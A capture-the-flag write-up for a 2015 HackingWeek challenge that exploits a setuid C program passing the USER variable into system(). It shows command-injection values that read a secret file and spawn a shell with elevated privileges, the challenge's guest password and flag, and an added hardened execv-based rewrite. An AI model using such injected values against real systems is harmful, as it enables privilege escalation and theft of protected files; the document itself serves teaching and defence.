English [HackingWeek 2015] [Exploit1] Write Up


Log on as guest (password: shu1eKoo) on machine
You will find the hidden validation key in /home/exploit01/.secret.

$> ssh guest@


We were given these files:
guest@ns314076:/home/exploit01/project$ ls -la

total 24
dr-xr-xr-x 2 exploit01 exploit01 4096 Apr 29 15:17 .
dr-xr-xr-x 3 exploit01 exploit01 4096 Apr 29 15:18 ..
-r--r--r-- 1 exploit01 exploit01  208 Apr 29 15:16 Makefile
-r-sr-sr-x 1 exploit01 exploit01 5590 Apr 29 15:17 vulnerable
-r--r--r-- 1 exploit01 exploit01  345 Apr 29 15:13 vulnerable.c

The source of the “vulnerable” binary is provided, so let’s check it.
guest@ns314076:/home/exploit01/project$ cat vulnerable.c

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
  char *buffer = NULL;
  gid_t gid = getegid();
  uid_t uid = geteuid();

  /* Make the real IDs match the effective (setuid/setgid) IDs, so that
     anything spawned below keeps exploit01's privileges. */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  /* The USER environment variable is pasted into a shell command line
     without any sanitisation: this is the injection point. */
  asprintf(&buffer, "/bin/echo %s is using this program!", getenv("USER"));
  system(buffer);
  free(buffer);

  return EXIT_SUCCESS;
}

As we can see, system() runs the command line built in buffer through a shell, and whatever the USER environment variable contains is pasted into that command line unsanitised. The setresuid()/setresgid() calls make the real IDs equal the effective ones, so the shell spawned by system() keeps exploit01's privileges instead of dropping them.
By default, the $USER variable contains the name of the currently logged-in user.
guest@ns314076:/home/exploit01/project$ echo $USER

guest

So logically if we execute the binary, it will output guest:
guest@ns314076:/home/exploit01/project$ ./vulnerable

guest is using this program!

Now let’s replace “guest” with a few commands, separated by semicolons.
We set the USER variable so that the shell executes “/bin/echo me;cat ../.secret; echo is using this program!”:
guest@ns314076:/home/exploit01/project$ export USER='me;cat ../.secret; echo'

Then we relaunch the program:
guest@ns314076:/home/exploit01/project$ ./vulnerable

is using this program!

Flag is raht6ae1Ue

By the way, if we wanted to get a shell, it would be possible using:
guest@ns314076:/home/exploit01/project$ export USER='me;/bin/sh;'
guest@ns314076:/home/exploit01/project$ ./vulnerable

sh-4.2$ cat /home/exploit01/.secret
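As an added example (not part of the original write-up or the challenge binary), here is the injection point reproduced beside a hardened rewrite. The fix is to never hand a user-controlled string to a shell: the child is started with execv() and an explicit argv, so a value like “me;/bin/sh;” is printed literally by /bin/echo rather than interpreted. The allowlist in is_safe_username and the helper names are assumptions of this example, not part of the challenge.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The challenge's command construction, reproduced so the injection point
   is visible. The caller must free() the result. Passing this string to
   system() is exactly the bug in the write-up; this example never does. */
char *build_vulnerable_command(const char *user)
{
    char *buffer = NULL;
    /* glibc prints "(null)" for a NULL %s argument; make that explicit */
    if (asprintf(&buffer, "/bin/echo %s is using this program!",
                 user ? user : "(null)") < 0)
        return NULL;
    return buffer;
}

/* Conservative allowlist (assumption of this example): a login name made
   of letters, digits, '_', '-' or '.', at most 32 characters. Anything
   else, including ';', '|', '$' or whitespace, is rejected. */
int is_safe_username(const char *s)
{
    if (s == NULL || *s == '\0' || strlen(s) > 32)
        return 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Hardened equivalent of the original system() call: no shell is involved,
   each argv element is passed to /bin/echo verbatim. Returns the child's
   exit status, or -1 on fork/wait failure. */
int announce_user(const char *user)
{
    char *argv[] = { "/bin/echo", (char *)user, "is", "using",
                     "this", "program!", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127); /* only reached if execv itself failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *user = getenv("USER");
    /* Defence in depth: validate the value and avoid the shell anyway. */
    if (!is_safe_username(user)) {
        fprintf(stderr, "refusing to run with a suspicious USER value\n");
        return EXIT_FAILURE;
    }
    return announce_user(user) == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```

Run with USER='me;/bin/sh;' the hardened main() refuses the value; even without the allowlist, announce_user() prints “me;/bin/sh; is using this program!” and exits 0, because execv() hands the argument to /bin/echo as a single argv element and no shell ever sees the semicolons.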
